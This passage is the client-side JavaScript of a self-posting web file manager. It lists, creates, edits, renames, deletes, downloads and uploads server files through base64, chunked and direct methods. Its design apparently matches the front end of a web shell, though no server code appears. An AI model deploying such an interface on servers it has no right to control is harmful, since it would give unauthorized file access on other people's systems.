if(newName&&newName!==oldName)await renameItem(filePath,newName);
universalModal.classList.remove('sh');
};
}
}
async function createDir(dirName){
const formData=new FormData();
formData.append('action','mkdir');
formData.append('path',currentPath);
formData.append('name',dirName);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
alert(data.m);
await loadFiles(currentPath);
}else{
alert('Error: '+(data.m||'Failed to create directory.'));
}
}catch(e){
alert('Network Error: '+e.message);
}
}
async function createFile(fileName){
const formData=new FormData();
formData.append('action','create_file');
formData.append('path',currentPath);
formData.append('name',fileName);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
alert(data.m);
await loadFiles(currentPath);
}else{
alert('Error: '+(data.m||'Failed to create file.'));
}
}catch(e){
alert('Network Error: '+e.message);
}
}
async function loadFileContentForModal(filePath,readOnly){
const formData=new FormData();
formData.append('action','view');
formData.append('path',filePath);
formData.append('d',currentPath);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
const textarea=document.getElementById('file-content-textarea');
textarea.value=decodeBase64(data.content);
textarea.readOnly=readOnly;
}else{
alert('Error: '+(data.m||'Failed to load file content.'));
}
}catch(e){
alert('Network Error: '+e.message);
}
}
async function saveFile(filePath,content){
const formData=new FormData();
formData.append('action','edit');
formData.append('path',filePath);
formData.append('content_b64',encodeBase64(content));
formData.append('d',currentPath);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
alert(data.m);
await loadFiles(currentPath);
}else{
alert('Error: '+(data.m||'Failed to save file.'));
}
}catch(e){
alert('Network Error: '+e.message);
}
}
async function deleteItem(itemPath,itemType){
if(!confirm(`Are you sure you want to delete this ${itemType}: ${itemPath}?`))return;
const formData=new FormData();
formData.append('action','delete');
formData.append('path',itemPath);
formData.append('d',currentPath);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
alert(data.m);
await loadFiles(currentPath);
}else{
alert('Error: '+(data.m||'Failed to delete.'));
}
}catch(e){
alert('Network Error: '+e.message);
}
}
function downloadFile(filePath){
const downloadUrl=location.href;
const formData=new FormData();
formData.append('action','download');
formData.append('path',filePath);
formData.append('d',currentPath);
const hiddenForm=document.createElement('form');
hiddenForm.setAttribute('method','post');
hiddenForm.setAttribute('action',downloadUrl);
hiddenForm.setAttribute('target','_blank');
for(let[key,value]of formData.entries()){
const hiddenField=document.createElement('input');
hiddenField.setAttribute('type','hidden');
hiddenField.setAttribute('name',key);
hiddenField.setAttribute('value',value);
hiddenForm.appendChild(hiddenField);
}
document.body.appendChild(hiddenForm);
hiddenForm.submit();
document.body.removeChild(hiddenForm);
}
async function renameItem(itemPath,newName){
const formData=new FormData();
formData.append('action','rename');
formData.append('path',itemPath);
formData.append('new_name',newName);
formData.append('d',currentPath);
try{
const response=await fetch(location.href,{method:'POST',body:formData});
const data=await response.json();
if(data.s){
alert(data.m);
await loadFiles(currentPath);
}else{
alert('Error: '+(data.m||'Failed to rename item.'));
}
}catch(e){
alert('Network Error: '+e.message);
}
}
uploadMethods.forEach(m=>{
m.onclick=()=>{
uploadMethod=m.dataset.m;
uploadMethods.forEach(x=>x.classList.remove('act'));
m.classList.add('act');
fileInput.click();
};
});
fileInput.onchange=e=>{
if(e.target.files.length>0){
selectedFile=e.target.files[0];
const fileExtension=selectedFile.name.split('.').pop().toLowerCase();
const fileType={'zip':'Archive','rar':'Archive','jpg':'Image','png':'Image','gif':'Image','php':'Code','html':'Code','js':'Code','css':'Code','py':'Code','pdf':'Document','doc':'Document','docx':'Document','xls':'Spreadsheet','xlsx':'Spreadsheet','mp4':'Video','avi':'Video','mp3':'Audio','wav':'Audio'}[fileExtension]||'File';
fileInfoDisplay.innerHTML=`<strong>[${fileType}] ${selectedFile.name}</strong><br><span style="color:#a0aec0">Size: ${(selectedFile.size/1024).toFixed(2)} KB | Method: ${['','Write','Chunk','Direct'][uploadMethod]}</span>`;
fileInfoDisplay.classList.add('sh');
uploadButton.disabled=false;
statusMessage.classList.remove('sh');
resultInfo.classList.remove('sh');
progressBarContainer.classList.remove('sh');
}
};
uploadButton.onclick=async()=>{
if(!selectedFile)return;
uploadButton.disabled=true;
progressBarContainer.classList.add('sh');
progressBar.style.width='0%';
statusMessage.classList.remove('sh');
resultInfo.classList.remove('sh');
try{
if(uploadMethod==='1')await uploadMethod1();
else if(uploadMethod==='2')await uploadMethod2();
else if(uploadMethod==='3')await uploadMethod3();
}catch(e){
showStatus('❌ '+e.message,'er');
}finally{
uploadButton.disabled=false;
await loadFiles(currentPath);
}
};
async function uploadMethod1(){
progressText.textContent='Converting to Base64...';
const reader=new FileReader();
const base64Content=await new Promise((resolve,reject)=>{
reader.onload=()=>resolve(reader.result);
reader.onerror=()=>reject(new Error('File read failed.'));
reader.readAsDataURL(selectedFile);
});
progressBar.style.width='50%';
progressText.textContent='Uploading...';
const formData=new FormData();
formData.append('u','1');
formData.append('d_b64',base64Content);
formData.append('n',selectedFile.name);
formData.append('d',currentPath);
const response=await fetch(location.href,{method:'POST',body:formData});
const responseText=await response.text();
let data;
try{
data=JSON.parse(responseText);
}catch(e){
throw new Error('Invalid JSON response: '+responseText.substring(0,50)+'...');
}
progressBar.style.width='100%';
progressText.textContent='100%';
if(data.s){
showStatus('✅ '+data.m+' ('+data.z+')','ok');
showResult(data);
}else{
throw new Error(data.m||'Upload failed.');
}
}
async function uploadMethod2(){
const chunkSize=32*1024;
const totalChunks=Math.ceil(selectedFile.size/chunkSize);
const uploadId='f'+Date.now();
for(let i=0;i<totalChunks;i++){
const start=i*chunkSize;
const end=Math.min(start+chunkSize,selectedFile.size);
const chunk=selectedFile.slice(start,end);
const formData=new FormData();
formData.append('u','2');
formData.append('f',chunk);
formData.append('i',i);
formData.append('tc',totalChunks);
formData.append('n',selectedFile.name);
formData.append('id',uploadId);
formData.append('d',currentPath);
const response=await fetch(location.href,{method:'POST',body:formData});
const responseText=await response.text();
let data;
try{
data=JSON.parse(responseText);
}catch(e){
throw new Error('Invalid JSON response: '+responseText.substring(0,50)+'...');
}
if(!data.s)throw new Error(data.m||'Chunk upload failed.');
const percentCompleted=Math.round(((i+1)/totalChunks)*100);
progressBar.style.width=percentCompleted+'%';
progressText.textContent=percentCompleted+'%';
if(data.c){
showStatus('✅ '+data.m+' ('+data.z+')','ok');
showResult(data);
}
await new Promise(r=>setTimeout(r,50));
}
}
async function uploadMethod3(){
const formData=new FormData();
formData.append('u','3');
formData.append('f',selectedFile);
formData.append('d',currentPath);
progressBar.style.width='50%';
progressText.textContent='Uploading...';
const response=await fetch(location.href,{method:'POST',body:formData});
const responseText=await response.text();
let data;
try{
data=JSON.parse(responseText);
}catch(e){
throw new Error('Invalid JSON response: '+responseText.substring(0,50)+'...');
}
progressBar.style.width='100%';
progressText.textContent='100%';
if(data.s){
showStatus('✅ '+data.m+' ('+data.z+')','ok');
showResult(data);
}else{
throw new Error(data.m||'Upload failed.');
}
}
function showStatus(message,type){
statusMessage.textContent=message.replace('❌','[ERROR]').replace('✅','[SUCCESS]');
statusMessage.className=`st-msg sh ${type}`;
}
function showResult(data){
resultInfo.innerHTML=`<strong>Upload Success!</strong><br><br><strong>File:</strong> ${data.n}<br><strong>Path:</strong> ${data.p||'N/A'}<br><strong>URL:</strong> <a href="${data.u}" target="_blank">${data.u}</a>`;
resultInfo.classList.add('sh');
}
function encodeBase64(str){
return btoa(unescape(encodeURIComponent(str)));
}
function decodeBase64(str){
return decodeURIComponent(escape(atob(str)));
}
</script>
</body>
</html>